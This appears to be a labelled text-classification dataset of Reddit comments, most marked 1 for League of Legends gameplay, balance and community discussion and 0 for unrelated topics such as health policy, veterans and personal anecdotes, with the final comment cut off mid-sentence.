0	The word “women” appears 134 times in the body of Obamcare (compared to two occurrences of the word “men”):   >   >Each occurrence of the word “women” outlines privileges and programs  that benefit women only . While all of these are troubling, there are seven in particular that spell disaster for men, boys, and fathers:   >1) Establishes the Office of Women’s Health within the Department of Health and Human Services.   >2) “There is established within the Office of the Director of the Centers for Disease Control and Prevention (CDC), an office to be known as the Office of Women’s Health”.   >3) “Establishing within the Substance Abuse and Mental Health Administration an Office of Women’s Health."   >4) “There is established within the Office of the Director, an Office of Women’s Health and Gender Based Research.”   >5) “The Secretary shall establish within the Office of the Administration of the Health Resources and Services Administration, an office to be known as the Office on Women’s Health.”   >6) Establishes the Office of Women’s Health in the Food and Drug Administration (FDA).   >7) Establishes the Office of Research on Women’s Health (ORWH) within the National Institutes of Health.   >These are the seven institutes that advise the central authority in Obamacare, the United States Preventive Services Task Force (USPSTF). The USPSTF determines which health coverage insurance companies must offer free of charge (“A” recommendation), which treatments must be offered with a copayment (“B” recommendation), which treatments are optional (“C” recommendation), and which treatments are not covered (“D” recommendation).   > The USPSTF has been busy doing its job, extending perks to women, and denying essential services to men.  Some highlights:   >1) Free birth control for women, but NOT for men.   >2) Free tubal ligation for women, but NO vasectomy for men.   >3) Free anti-cancer vaccination for girls, but NOT for boys.   >4) Free smoking cessation for women, but NOT for men.   >5) Free STD treatment for women, but NOT for men.   >6) Breast health for women, but NO prostate health for men.   >7) Violence prevention for women, but NOT for men.
1	I used to play Veigar before so my point is: the recent "fix" (fix because it should be intended to work that way anyway) is good because I hate it for the 100th time that a random champ with a random dash abilities just jump out of my cage, even worse yet, they come right at me with murder intention. If they flashed, i would feel better because at least I take away their Flash which has a relatively long cd. But no, random dash can just do the job effectively and ruined my day.
0	We call them "buttflickers" in my family and after years of cleaning them up on the side of the road as a boy scout I can say it absolutely infuriates me when I see it on the road. Almost as mad as I get over texting.   STORY TIME! At our local chili's one afternoon, and a huge luncheon of state troopers is also in the restaurant with us. They leave before us and, before actually leaving, several stand outside near their cars for a smoke. My family can see them, because they are right outside our window, and after 3 of the 6 or so officers throw their butts on the ground, my sister, father and I went to the parking lot, quietly walked up to them, and without a word picked up the butts right at their feet. Didn't say a word, and my mom said their jaws dropped when we turned away from them.
1	The only major reason he is barely picked (as I have read pros commenting on him) is his lack of CC. He has a short silence, and that's it. And your argument about "proving it" is stupid. He has just as much team armor shred as Wukong, and even more than Pantheon and Renekton if he's built correctly. He has better defense without having to build all tank, and he has better offense without having to build all damage, than what any of those champs would have. (I.E., if Wukong and Garen both built all damage, Garen would be tankier. If Wukong and Garen both built tank, Garen would have better damage.) All of his use is a matter of which playstyle you prefer, and what specific utility you need for a particular team. He's one of the best straight-up bruiser-type combatants in the game, if that's what you need in a top laner. As I said, he's VERY good at closing on Carries and surviving long enough to kill them, which is a prime use for him. I don't understand why you say he's useless, just because there are other champions that are SITUATIONALLY more useful than him, as that's what it comes down to, each particular situation.
0	It is a horrible burden to bear. . .   The financial security, the expensive vacations, the wonderful restaurants, the golf. . .   Truly, my life is empty.   Edit:  I'm not advocating money as a way of life.  But I'm trying to provide a reality check here.  Money is really, really, really nice to have.  Compared to a parallel universe with a poorer me, my kids grow up in a nicer neighborhood, get to play soccer, ski, or whatever, graduate with no student debt of any kind.  Meanwhile, when I get sick, I got to the hospital without worrying how I'm going to afford my mortgage.  When it is shitty in winter, I take two weeks and bring the fam and the grandparents to the dominican.   The idea that money does not improve your life is a hilariously farcical message that has been sold to you by big corporations (hollywood, hallmark, blah blah blah) attempting to appeal to your emotional purity.  I bet you same guys rage at wall street all the time for destroying the economy: by this logic, they are making your lives better by making you poorer.
1	I had an issue with my computer where I'd gotten the Maestro error.  After several reconnect attempts, it was finally suggested to me by a friend (Luckily, I was in a premade 5 Blind Pick) in Skype to reboot my computer.  I rebooted and then I had to download a LoL 'patch' as well.  Then, I went to eat dinner while it was DLing, and then it was still patching by the time I'd finished.   I got back into the game eventually after another few reconnect attempts about 25 minutes into the game and then played for the last 10 or so minutes.
0	A meta review WOULD be amazing - unfortunately, either the science isn't there yet or I can't find it.   You assume the science is going to get there. You should withhold action until proof is actually in.   > What if you had a conversation with your partner and explored each other's bodies, fantasies, and kinks together?   You can do that and still watch porn.   I do have access to pubmed with the University.   > "The significance of heavy pornography involvement for romantic partners: Research and clinical implications"   Ok, here is the method of this article :   > In this research we collected and studied 100 letters posted to four different internet message boards by spouses, fiances, and girlfriends of men perceived to be heavily involved in pornography. We then culled these letters for their recurrent, outstanding themes. The message boards selected for this research were ones frequented primarily by self-designated sexual and pornography “addicts.” Secondarily these sites were utilized by partners of these individuals who had discovered their partners’ behavior, were distraught over it, and were writing in to seek solutions and emotional support from others who shared their plight (see final note for listing of specific sites).   So it is pretty clear that this does not work in your argument. These are women who believe their SO is an addict and they see it as bad. The sample is taken from a website that women go to to get help, so they obviously have a research bias. This is a shit article for any scientific point.   > Brain Processing of Visual Sexual Stimuli in Healthy Men: A Functional Magnetic Resonance Imaging Study   All this study basically says is that the brain sees the image differently when it is arousing. Here is part of the abstract :   >  Among activated regions in the S condition, parietal areas are known to be involved in attentional processes directed toward motivationally relevant stimuli, while frontal premotor areas have been implicated in motor preparation and motor imagery. Further work is needed to identify those specific features of the neural responses that distinguish sexual desire from other emotional and motivational states.   > Activation of Mirror-Neuron System by Erotic Video Clips Predicts Degree of Induced Erection: An fMRI Study:   Again, the whole point of the study was to show watch lights up when you watch sexually arousing pictures :   > When presented with sexual video clips, eight out of ten healthy subjects had an erectile response demonstrated through volumetric penile plethysmography.   So basically you said : "Porn hijacks the biological process meant to bond people to each other and instead men begin to "need" the images on screen" before siting these 2 sources. These 2 sources only said yes, porn does cause sexual stimulus, it had nothing to do with hijacking or needing the image on screen. Clearly you have simply sited these without looking at them.   > To the next article : Pornography addiction: A neuroscience perspective   This is definitively not conclusive. It does show some interesting stuff (and is finally on topic) but many scientist disagree, and rightfully so. You can read it [here]( Both your article and mine needs more science!   Now to the non-science part : I DON'T CARE. News full of anecdotes does nothing, they are clearly ignoring cases where both partners are aware of the porn watching (my own anecdotal evidence), and nothing goes wrong! and then claim to be giving a good article. And the Your Brain on Porn website is full of TEDx talks and just non-science sources.   Conclusion : You say things, back it up with articles, but more often then not, these articles don't even mention what you claim they do. Please provide actual sources, read them (at least read the abstract further then finding the word porn) and I will read also. And please stop giving me non-science articles, because they are just a waste of time.   I am definitely ready to change my mind and follow the science. The science is clearly not shown. Please consider the same, you open and change your mind. Nothing wrong with that!
1	I have a rule for myself and it's like this. When Ashe gets nerfed is when I uninstall league forever.  At that point I lose all the faith I have left in Riot's balance team, because Ashe can't be OP unless they give her a dash or something. 325 base MS with no speedup/dash or anything else.  Another thing you have to consider is she has 1 damage skill and ult. She needs low CD on W because it's the only damage skill she has. Q is utility, E is passive pretty much and there's long CD ult that can be dodged easily if played right.  Compare to someone like Lucian, Q is AOE damage, W is AOE damage, E is dash, ult is damage.
1	This is so fucking pointless :>, he hasnt imrpoved even 1 bit, he's same player he ever was, he's neither primary nor secondary threat, he just sits back and cleans up. You are just as wrong ppl who say he's bad and worse than steelback (Im not gonna go trough your history and find out 2 weeks ago you wee #keepsteelback) :>
1	what you need to start a pro scene is not gaming houses, coaching stuff or similar things you see right now.  what you need is competition, regular competition outside of those soloq/team q games.   We see this problem in the amateur scene of NA and EU as well, where due to the lack of tournments, small teams cannot become stable, they lack the income as well as the regular competition.   The first thing to do would be hosting a lot of regular tournments, get those teams who want to become pro prove themselves in competitive environment. Make advertisment, get sponsors.   After you have some steady income, the next step is to invest into improving your scene.
0	Story time!  So I definitely feel your pain, OP. one of the first times I smoked tree, I was at a friends and it was around 9:30 at night. Deciding I couldn't stay any later, I decided to walk home, but about halfway back, I realized I'd forgot to piss at my friends and had to go pretty bad. No biggie, the streets were lined with woods, so I just ducked off to the side, whipped it out real quick, and pissed. I immediately zipped back up, couldn't have taken longer than twenty seconds. So I continue my journey homeward, and upon arriving home I have to pee again (those Big Gulps will really do you in.) so I head to the bathroom after saying hello to my dad and roommate, still relatively high, and whip it out once more. This is when I notice a strange black dot on the head of my dick. I rationalize it as lint, and attempt to brush it off, but when I do, it causes some serious pain. That's when I realized the 'lint' is actually a huge fucking tick. I panic, scream for my dad, and tell the story to him and my roommate as they laugh themselves to tears. My dads solution? To heat a needle and burn the ticks head to get it to let go, and pluck it off with tweezers. After twenty minutes of repeatedly missing the ticks head and burning my dick, I proceed to let out a mighty war cry and rip the tick from my dick. I come out of the bathroom to find my dad and roommate standing just outside the bathroom, still laughing from my howls of pain. My penis had burn marks all over it. I was known as "tickdick" around the house for three months straight and dear old dad told the story to any of my friends who would listen. Namely, all of them. They still call me tickdick now and again, just to humiliate me.
1	Really? I've lived to the day when people want
0	This this this this. Many here are being sarcastic or funny, but then there is the large group that doesn't get that it is a joke with it's time and place and within context can be funny. They think it was funny then so it is funny all the time. Not being too literal here and I have had a few tonight, but you get the point. Think before you speak.
1	The thing is about having a higher mmr then your division is not detrimental, i went from plat to silver in my bo10 and recovered my mmr before even leaving silver, now that i'm in gold with still a plat mmr if i win i win 30+ points and if i lose its about 10 points. That means that in order for me to climb to my current mmr is EASIER then going down, if i go 50/50 and win my promos i'll reach platinum sometime and i don't know why so much people care about your division, so many people flamed me hard when i got matched up with plats 3-5 and i was silver 1, they simply assumed i was a fucktard even without the match beginning which is really annoying.
0	Retired military person here - I don't think honoring Veterans and recognizing their service/sacrifice promotes war; people join the military for different reasons and have very different experiences.  We're not all heroes and I -- quite honestly -- met anyone during my time in the military who  WANTED  to go to war.  Yes, we will do what is necessary to defend our country and we absolutely want to stand with our unit in good times and bad.  We know that we succeed more easily as a team.   Whether or not a person spent time in battle under enemy fire isn't necessarily a discriminator.  We served and the potential for us to answer a higher call is part of the deal.  We all gave and will continue to give, but the level of giving will always vary.  Some will give more and you may or nay not see the price they paid -- some lose limbs, or their mind, or their life.  Others serve relatively uneventful terms of service and go on to rejoin civilian life.  Yes, there are many big, damn heroes among the ranks of those who served and a lot of us who gave much to serve our country.  They do deserve our thanks for being there to defend our freedom, our country and our way of life.  We got things in return though too -- that's part of the bargain.  We had opportunities for travel, to go to school, to learn to become leaders, to learn skills.  We earned a paycheck and received benefits.  The government agreed to take care of us for our service.   As a personal example - I joined because I came from a broken family and didn't have the guidance and leadership at the time to help me plan my future.  My high school grades were crap and I had no idea what I wanted to do when I grew up.  A friend of mine joined and when on a whim to talk to the recruiter.  I originally planned for a "four and out" career, but ended up staying nearly 22 years.  I saw the world, got an amazing education (just finished my doctorate) and have a great after-military job (I work for the VA now).  In fact, one of my military-brat daughters is in the military now and could be making this a family tradition.  I owe the military a lot as it has gone a long way toward making me the man I am today.   We who have served generally are proud to have done so, regardless of the branch we were in or the job we held.  We hear our service song and we stand a little taller as it plays.  We snap our sharpest salute as the American flag passes or the national anthem plays.  Sure, I bet there are some people who  DO  join the military for the chance to be in combat, just as others join for travel, education, experience, a paycheck, family tradition, a sense of patriotism or what have you.  We each have our own reasons and I don't think it's fair to clump us all into a group of wanting to wage war.   Regardless of our personal reason for joining the military, we were there to serve our country -- that's you and me.   The bottom line, to me, is that those who serve honorably deserve our thanks.  I understand my perspective is different because I've been in the military and it might be more difficult for one who has not shared that experience to understand the challenges inherent with military service.  Thanking a Veteran for his or her service doesn't mean we're more willing to wage war.  We're thanking that person who raised their hand and volunteered, for whatever reason, to participate in the war if our nation's leaders determined that choice of action.  The military doesn't decide on war -- that's left to the president and the congress.  We have civilian leadership and a commander in chief who are responsible for those decisions.  The military and the people serving in it do not make policy -- we just stand ready to enforce it when called upon.   I see Veterans every day who gave of themselves to one degree or another to serve our country.  Most of them don't ask for thanks for their service -- it was part of the bargain -- but I've never seen one who didn't appreciate a thank you and a hand shake.
1	Honestly, this is not needed. This is a problem of multi-tasking. Most of the time I just quickly navigate to where the action is, determine whether it's needed or not and if it is then just shoot it where I think the enemy will be. Also, it's not travelling that fast and you can spare a glance or two in the mini-map, even if you are trying to poke or trade or w/e it is you want to do, since it's right there in your field of vision unless you tunnel really hard. Other times you just guess the location and release it via the mini-map, oh the joy of sniping someone through that is priceless! And we can have a look at this:  Upon reaching the edge of the map, striking an enemy champion or upon the reactivation of Whirling Death, the axes will slowly come to a stop before changing direction and returning to Draven, dealing the same damage to every enemy struck on the way back.  so there's that as well. It always returns to you and not somewhere else, like for example Gnar's Q.
0	Fuck. You. Tell me ADHD isn't fucking real, I have to deal with being a fucking wreck and an asshole when I'm off my meds and being awkward and anti-social when I'm on them. The condition is very god Damn real, and it has made my life and my family's life far harder than it should be. So get the hell out of here telling people that they're "just imagining it" nothing makes me angrier than assholes like you who got mis-diagnosed with ADHD and now they think it's a fake illness because "look a doctor said they had ADHD when they were young, but they overcame it!"
1	I think this comes down to matchup - helping out a 2/0 Jayce is not worth it if they have a 2/0 Vayne  But if it is a Jax? Then yea, go for it.  Also this comes down to lanes - top is very snowbally, so if you get them two kills they should nearly always win their lane; there isn't much reason to go back after that unless it is for a countergank  For mid you have to understand who you can gank and who you can't - it's rarely worth trying to gank a Morgana, for instance, but a Morde is a must gank in the early levels. It's rarely worth ganking for a Karthus, as he can just farm, but an Ahri may really need them kills early to 100-0 someone in a teamfight  Bot lane depends on the matchup, but it is always worth going down there a few times. Ultimately, the AD is the most important person on your team, and getting him ahead is always getting your team ahead. You should especially help out when your support has an easy set up for you - Zyra ult, Taric stun, Vayne condemn etc. Also remember that whenever you are bot you are near dragon, and any clean kill can be converted into 1k gold for your team, which benefits everyone
0	I was already rolling my eyes expecting it to be "he is a loser lol". Glad to see I was wrong. If someone was a dick to you in school,  who fucking cares. Dont get hung up on high school. But the fact a douche bag turned I to a solid human being is cool and definitely a success.
1	i didnt like gw1 at all because it was not what i was looking for when playing an mmorpg so i was very happy when they announced gw2 because it had a lot of elements which are crucial for me (open world for example). but the game was done in 2 weeks. i hit lvl 80 and visited every place. i had the best gear (stat wise) and all further playing would be for fun (which i dont have if i dont progress).
1	The point of changing Banshee had nothing to do with Ryze, it was bad for several reasons and when specter cowl got introduced to improve MR options for lane (back when AP was dominating top lane) it just got changed because it made more sense :     catalyst just made little sense in build path because it was mostly a late game defense items for carries (back when tanks were better off with FoN or Spirit Visage), you would buy the item late in the game when catalyst passive is wasted      if you didn't need the mana before that point you don't need it at that point either (except for Ryze but it wasn't really broken on him anyway)      mana makes it a shitty item for manales champions and they wanted MR items to be better for tanks as well when banshee got changed (again back in AP top domination, ie. Elise/Rumble/Vlad/Kennen/Singed/Zac)       So there would be no problem having a supportive item build out of catalyst with resist. It wouldn't even be good on Ryze, Ryze needs to rush RoA and Tear, then depending on how the game goes there are several paths :     Snowballing - Seraph -> Void for maximum damage   Need MR - Spirit Visage - for CDR and MR and improving his ult spellvamp      Need Armor - Frozen Heart - Mana/CDR/Armor        Even if it gave MR instead of AP Spirit Visage would be a better pickup, not to mention that two catalyst passives don't stack and wouldn't very efficient.
1	I'm going to repost my canned reply to this question:   I'd like to take the chance here, assuming I don't get downvoted, to clear some things up.   I'm a Systems Administrator for a large company that handles a very large infrastructure. We also use Internap, just like Riot does.   The LoL client is essentially two things: a web browser, and a chat client that uses the XMPP chat protocol. The infrastructure LoL runs on is fairly complex; Hadoop for the storage layer, Java for the server software layer (I think!) and a number of caching systems such as memcache, terracotta, etc. The client does not know what server, or set of servers, the user will be playing on. There is no way to know which part of the infrastructure you will be hitting.   Ah, but I'm sure you're thinking, "So what? All we need is ping times to their gateway device!" Not so fast. I imagine that internally, Riot servers are stacked on MPIO and/or stacked switches. The bandwidth and usage of these switches are also subject to packet loss and degradation, along with iowait at the OS level. See where I'm going?   Unless the client knows the exact server you are going to end up on, the client can not test the path all the way up your ISP, to Internap, into their gateway, up their switching system, into the server. Any and all of these things matter in getting an accurate ping time. Not to mention delays in their caching system (because, lol, Java mark-and-sweep), and all their networking paths, OS iowait, etc. Even if, IF the client did know the exact server it was going to end up using, Riot would have to handle even more connections (because if I were Riot, there is no way in hell I would allow ICMP into my game servers...) on every single server figuring out the delay between packet communications. Further, even IF Riot allowed pings into their game servers, it wouldn't be indicative as to any actual delay times you would feel due to delay outside of packet delay, such as the aforementioned caching systems, storage layer, database layer, and all the networking paths in-between them.
0	It didn't work for my parents. They were married and in their late 20s and they were still forced to sit at the kids table at dad's parents' house.   Don't think it was just an age/status thing, as dad's younger siblings got to sit at the main table during the same holidays. Also when I was a kid my younger male cousin got a place at that table, while I still had to sit at the little one (I'm the eldest of the grandkids).
0	Yes, but do you listen to Country music (the genre by which she is defined)? Country music's focal point is romance, whether it be the finding or  loss  of it. Naturally, the core of her music is going to be centered around that ideal. But she also has a handful of songs not directly about romance. Consider "The Lucky One," which is on her album,  Red : it's about how fame isn't as glamorous as it's made out to be, even though everyone insists that "you must be so lucky to have hit it so big."   I mean, think about a lot of mainstream/hip hop themes: Money. Drugs. Bitches. You're not insisting Lil' Whoeverthefuck change it up. It's just music, yo.
0	You added absolutely nothing to this thread.   Heavens yes!   (
0	My biological "mother" doesn't have any sort of maternal attachment to me whatsoever. She wasn't there when I was growing up because drugs and men were a bigger priority in her life. I went from ages 6 to 23 without her in my life, and when we reconnected the relationship was really awkward and not at all like a normal mother-daughter relationship. I'm 30 now, and I've completely shut her out of my life because she has too many mental issues (including a being one of the most immature people I've ever met) and she takes pleasure in my misfortunes and even caused and contributed to bad things that happened to me. She definitely has mental issues that I don't need in my life EVER.
0	Funny story about that:   There was a kid that use to say that all the time to me, but then one day he went to far. So I decided to punch him in the face. He ran home and told his dad. He came back with his dad and was like "ha. now my dad is gunna beat you up then we'll sue you."   Little did he know his dad was there to make him a man. His exact words were "If you are going to act tough, you have to learn to fight."   I started laughing my ass off! His face was priceless!   So, since i landed one blow already, i thought i'd be a gentleman and let him have the first blow on the actual battle.   He slapped me...   I got so infuriated that i went super saiyan on his ass. I just wasn't stopping. I was destroying his face.   The best part was that his dad just sat there and watched his son get whooped!   It ended when he backed up into a hair and fell over. He was crying hysterically.   His dad then told him that he was an embarrassment to the family and left him there.   It was one of the highlights of my life. It felt so good to put that kid in his place and I lived happily ever after!
1	They have to win all their games for a chance for 6th.   Not only that but pray that roccat, sk and cw don't win much too.   Gotta think that there's still SK x Roccat and Roccat x CW to be played.
0	I can't believe I'm actually going to jump into this, but I think I am.   I feel differently about the "lump of coal" tradition since I read the book "Angela's Ashes," in which you realize how much a lump of coal has been valued in the past.  Kids go running around the street seeking out lumps of coal that have been dropped, so they can bring them home for the fire in hopes that their families will have a little warmth.   In modern times, we have come to think of a lump of coal as the stereotypical "anti-present," no more valuable than a dirty diaper.   But actually, I'm willing to support the idea that a lump of coal in a stocking was considered to be an actual present, though certainly not the ideal present for a child.   It's a way of punishing them while still giving them something of value.   The reason I respond to this particular post is because I would think a lump of coal wouldn't generally be found in any fireplace in which coal was burned, because that coal would have been burned (oh, for what it's worth, I was born and raised in a home built in 1905, whose fireplaces were designed for coal.  They're much, MUCH smaller than wood-burning fireplaces).   This is pure speculation, by the way.  I haven't actually looked into it any more than my personal history with coal-burning fireplaces, and my reading of the book I mentioned above :)
0	Pretty common from what I'm told. I do it, and many other uncircumcised guys do it. Lest you get that drop of piss stuck in there and it leaks out all over your undies and sometimes to the surface of your pants. Among other nasty complications. So if you see a guy walk into a stall, and just hear the noises of him taking a leak, chances are he's doin a dab.   Also, to answer anyone who might ask "how do you wipe if you are forced to use a urinal?" it's really simple. I wipe it on my hand, and then wash my hand. Might as well, right? I was gonna wash my hands anyways before leaving the undoubtedly nasty restroom I was just using.
1	Okay guys go look at his ranked stats. This guy has more deaths than kills on literally every single champion he played. Literally every single one his kdr is negative. Yet he's diamond. From all the people I've seen hit diamond, there are just two things essential to climbing.     Kills aren't everything. This guy doesn't even farm well (that vlad cs) but wins more games than he loses. Objective control and communicating well your team is much more important.   If you just play a lot you'll inevitably get better. Unless you really have no natural skill in the gaming area, you'll hit diamond easily as long as you can play without stressing yourself out. Play for fun and play a lot. You'll get there. So many diamond players i know are mechanically worse than most of my plat/gold friends but they have 400+ ranked games and they play the game with a good attitude.
0	Not really. Games in general stimulate the brain, and improve senses, problem solving, and intuition. Games that require critical thinking, like puzzles and stealth mission games, are even better for you. TV on the other hand, is just passive. If anything TV stimulate the emotional parts of your brain, which can induce some negative impact (not always, and not for all people...this is not a law just a theory) on the thinking process.
0	If you have serviceable vision (I would say 20/40 or better), note how you see. Then, walk into a man sized not-quite-transparent ball, a la "bubble boy" idea. Can't discern anything with useful detail from beyond 3 feet without glasses. So basically, if I look at a lunch table in a high school across the cafeteria (hopefully a situation the masses can fathom), imagine not being able to realize that somebody 50-60 feet away has eyes. Or a mouth. Or a nose. And that your crush is dead-eyeing you. And that their head isn't a distorted skincolor+haircolor deformed poke-ball blob on a neck. Mind you, I haven't had my eyes checked in like 3 years, so it could be worse than the 20-200.
0	But there weren't widespread hunan rights violations in Iraq. By invading, we made the average Iraqi's life worse. We also created a war which resulted in hundreds of thousands of civilian deaths.   In Syria? Their government was actively killing their people with chemical weapons. Global intervention would have only helped.
1	From a ganking standpoint however, if your laner has a good engage as you are entering the fray, the ganked opponent will likely have blown their burst, and will instantly enter the mindset of needing to run away. This is where Naut shines - land a hook/AA/Ult and CC train engaged - there is no time for an opponent to pop the shield.   Naut's damage with a couple points in his shield, assuming he can get a few AAs in is quite remarkable, and most people I play against don't expect it, at all.   This aside, his peeling potential in teamfights is completely unmatched. If your comp is a protect-the-carry comp (which is pretty common in the current meta) you will be hard-pressed to find someone who can protect and let the carry deal damage throughout a teamfight. Not to mention the pick potential.
1	Basically the only difference is crit.   Lucian's second auto and Caitlyn's bonus damage interact with crit while Quinn and Vayne's bonus damage don't.  Basically with the same ad Lucian and Cait will do more damage than Vayne om a crit but the same on a normal auto.  Quinn passive is just different because it scales off bonus ad and has a base damage, so it's not really comparable.   Sidenote, Lucian can crit on the 1st auto but not the 2nd or vice versa whereas cait's bonus damage is tied to the main auto for crit purposes.   Also, Lucian gets 2 procs of on-hit effects
0	I think the idea is that dyed hair is more of a commitment than, say, breakfast. Granted, not a huge one, but you can't color your hair twice in one day without it being fried all to hell.  And it's safe to say that it's way more expensive and that it can be a bitch to go back to the original color.   And specifically adopting traits of other people your s/o is attracted to just seems like the mark of insecurity to me. Say your ex was a redhead; if your current gal dyed her hair to match, wouldn't that seem a little creepy?
1	Too inconsistent. I don't know if you've followed PBE Soraka at all, but they've reworked every single one of her skills excluding her ult (which they did make stronger I believe).   Essentially, her passive now makes her move faster when she's walking to a low-health ally. They want her to be an ambulance. Cool.   Her Q is now a single AoE on the ground. She chooses where to fire it and it fires (no projectile though). For every enemy champion she hits, she heals some based on her W rank.   Her W now costs 10% of her max health to heal an ally. She can't heal herself, and the 10% cost doesn't even go into how much she heals. So with enough health, it would actually be possible to damage herself more than she's healing her ally (so a net-loss of health for her team).   Her E is now an AoE on the ground that lasts for 2 seconds I believe. While in the area, enemy champions are silenced. If they are still in there when it disappears, they get snared. The problem is that Soraka doesn't really have a way of keeping them in there. It also damages enemy champions, but I'm not sure if it's when it's placed, if it's a DoT, when they walk in, or if they get snared.   And her ult is stronger.   My two biggest problems with her kit are her passive and her W. For her W, she has to spend both a percent of her max health to heal someone, plus it still has a mana cost. She doesn't even get to heal them for a percent of their max health or anything. And then her passive makes her an ambulance. It is supposed to be there so that she can get to an ally when they're in danger (and it does make her fast admittedly). The problem is that Soraka only has two ways of healing an ally and one of those is a global heal. They want her to be a healer, but she has two ways of healing (can't even restore mana anymore).   I think that if they wanted her to be a healer, they should have made her be that, implemented different ways of healing. A direct click-heal, an AoE on the ground that has massive health regen for a short while, a mark on an enemy that heals champs who attack it (similar to Shen's Q). Riot is so afraid of solo-lane Soraka, that they're not letting Soraka do what she needs to do even for support.
0	For probably a long, long time. We are very good at taking proteins that already exist and maybe changing a few nucleotides when there is a specific goal to optimize for like substrate binding.   However, proteins are globs that fold in a very difficult way. The energy functions that dictate folding are well known, but optimizing a string of amino acids into such folds is computationally intractable, and mostly impractical for biologists now. Knowing how to predict folding is necessary to engineer proteins from scratch, since function follows form. It will be a  very  long time until that happens, and longer after until we can start engineering useful proteins. Plus, obviously the efficacy required for an engineered protein use in consumer food would be enormous. It would be more useful for industry, possibly to express recombinantly and use to produce cheaper drugs or the like.
1	This is it pretty much (except for the trolls :S). There's an effect called  "tilt" . Use LoL Recorder and watch your replays. Start exterminating mistakes you make. Use this  spreadsheet . Soon you'll start to love solo queue.
1	GP is considered underpowered because people aren't willing to learn a new play style for him.   I still see people building Critplank, even though it's hilariously weak. People won't build him like Irelia, even though it's rather strong.   High mana cost issues are gone, just build Philo and you're ok.  I personally feel that you should never use his Q to poke your opponnent down. It's meant for farming, not poking. Boom, "Mana issues" gone.
1	That is a very very difficult attitude to maintain imo. I've played video games for 15 hours a week minimum and I find that sometimes playing to improve isn't enough to get me to play a game at all. Sometimes the only motivation i have to play league is to get ip or lp in order to rank up. Or if a new champion comes out. But for players that can't play at all and specifically take time out of their day to play only 1 game it's very frustrating. You can hardly improve at all with 1 game a day, and if you do improve you would have to be playing the same champion every day for it to even be effective. We humans love feeling that our time was well spent, and that is very hard when you are pressed for time and things go sour. If his goal IS to climb the ladder then he has to realize his intentions are misplaced. Goals you place in a video game are your own, not the communities. Maybe he's diamond 5 and very skillful? Gaining lp is one of the few reasons he plays?
1	Now you have played Dota 2 (I play both LoL and Dota 2, don't have a favorite either) you will likely have noticed that many champions in LoL are based on champions from Dota, this isn't exactly stealing since Guinsoo was once the lead designer of Dota. But it is a little disappointing because many of the champions in Dota don't necessarily fit into LoL's style.   Riot have, at least in the last 2 years or so, designed champions to fit a certain role, they even admit to it themselves. i.e "we will be adding another support champion soon" This is part of the problem in some aspects. By building a character to fit a role you are essentially limiting them and the overall meta. Sure some people will find some odd way to use them but they will generally be in the minority. I find it funny that Riot are so against a role select option when they pretty much enforce these roles themselves.   In Dota the champions are just built mainly to the theme of the character design. It's left to the players to find where they fit in. This tends to leave them with some pretty quirky kits and the meta in Dota tends to be more open. As an example there is a champion in Dota (Lifestealer) who can hide in the bodies of his allies and enemies, making him insanely fun to gank with (hide in a creep, until it gets to lane and SURPRISE  old video:  and you thought Fiddle was an asshole) but his kit isn't made for him to specifically be a Jungler and because of this he is also a great carry, can be a great tank too if you want, you could even play him as a viable support.   LoL aims to be a simpler game than Dota so in some aspects it's understandable, I just wish they wouldn't make the champions quite so focused.   I recently took a break from LoL and returned to it about 2-3 weeks ago. I left about when Varus came out and out of the new champions since then (14) there is only 4 I am interested in. One of which is Vi, I find it quite odd that you would single her out because compared to the others she is one of the most interesting of the newer champs, but then many of the new champs are riffs of old Dota ones (Nami/Naga Siren, Elise/Broodmother) This isn't exactly new for LoL (Rumble/Timbersaw, Cassiopeia/Medusa, Ursa/Bloodseeker/Warwick, Corki/Gyrocopter to name just a few) but for a while they had stopped doing it, it's a shame to see them go back to it. The rest just seem to be a mix of old champions and new tricks. Couple of examples, Fiora is a lot like Yi, Diana is a more tanky Akali, Quinn is pretty much Ashe meets Vayne. etc.   This is bound to happen when you are creating champs to a schedule so regularly. People simply run out of ideas. I think Riot once said that once they hit 100 champs they would slow down the production. This would have been great to see, champs would then spend a lot more time in planning and people would be given time to have new ideas. While it has slowed a little bit it's not by enough. We need a period of no new champs and just balancing/reworking of old champs. Let the designers recharge their creativity for a bit.
1	Hello,   Thanks for the letter. I'm not a Riot employee but I have played this game for a very long time. Just like you, I have found myself fascinated and frustrated by the toxicity of this community. The topic of justice in these new online wild west environments is extremely interesting to me. I want to address some of the points you've brought up because many of them have been brought up before.   > At first I figured it was just because they didn't have the same size player base that League of Legends did, but I quickly realized it was much more than that.   To most people, league has always been toxic. But for someone like me, who has been playing consistently since beta, its not hard to notice the change over time and the factors that correlate with the changes.   Here is a comment . The fact that LoL is the #1 streamed game of all time coupled with the "Free to play" looks like a formula for dirtying the playground to me.   How can streaming be a bad thing? People like to see pros win and try to emulate them. It gives people (who don't understand the game in the first place)  an easy way to separate black from white . This build is WRONG or this champion is TRASH. When their expectations (stream) don't meet reality (game) they lash out. These people are less likely to care about the integrity of their account or their reputation because LoL might be a thing they're "trying out" or something they just do sometimes. The kids who seldom visit the playground are less concerned about dirtying it.   They also feel justified about bashing others because they're playing the game "correctly" AKA what they saw on stream. This is where the idea of meta sheep comes from. Players, like me, who play the game organically, to experiment and experience a variety of playstyles, are labelled as trolls and shunned.   > Clearly, nobody is afraid of being reported, and I feel it's because Tribunal is a flawed system   I actually agree with this. The tribunal is not a perfect system but  it would be remiss to ignore the good it has done.  From what I have seen, the Tribunal has been an utter success in lowering the degree of toxicity if not the frequency. [Here is a comment]( I wrote on this subject. The OP here is arguing that today's community doesn't know what an intentional feeder is because they don't exist in the same abundance as they used to. But didn't I just say that beta was a "clean" playground? How can this contradiction be true?   There is a major difference between the flavor of toxicity that exists today and the toxicity that the Tribunal got rid of. The difference is that  today's toxicity tends to be incidental, while previously it was blatant and intentional.  Even the example you gave of your friend probably wouldn't count as blatant toxicity in the old days.   For example, an old troll was actually very dedicated to his "art", this is where you see scores like 0/40. There were even guides written on how to feed in the most efficient way (teleport, mobi boots, zeals etc). Very few people would make an account, get it to 30, just to have it banned for trolling. Perhaps this is why you see more of these old style trolls in the very low level pool. Trolls today tend to be more subtle, passive-aggressive and turn to trolling because something angered or upset them. An old rager would be completely unrestrained; lets say someone dies and he blames you for it, today's rager would probably spew some rage each time you do something "wrong". An old rager would proceed to spam the N-word in chat for the entirety of the rest of the game.   The problem here is not that the tribunal sucks or it doesn't work.  Its that people have gotten better at toeing the line.  People will always do this, wherever there are rules, there are loopholes. Your friend, even though he seems unrestrained, probably knows that if he goes too far, he will be banned. Ragers can stagger their toxicity across many games, forcing a large error margin for tribunal hits. Riot do not prosecute these cases because they've received so much flak for false positives. Finally, premades reporting is a 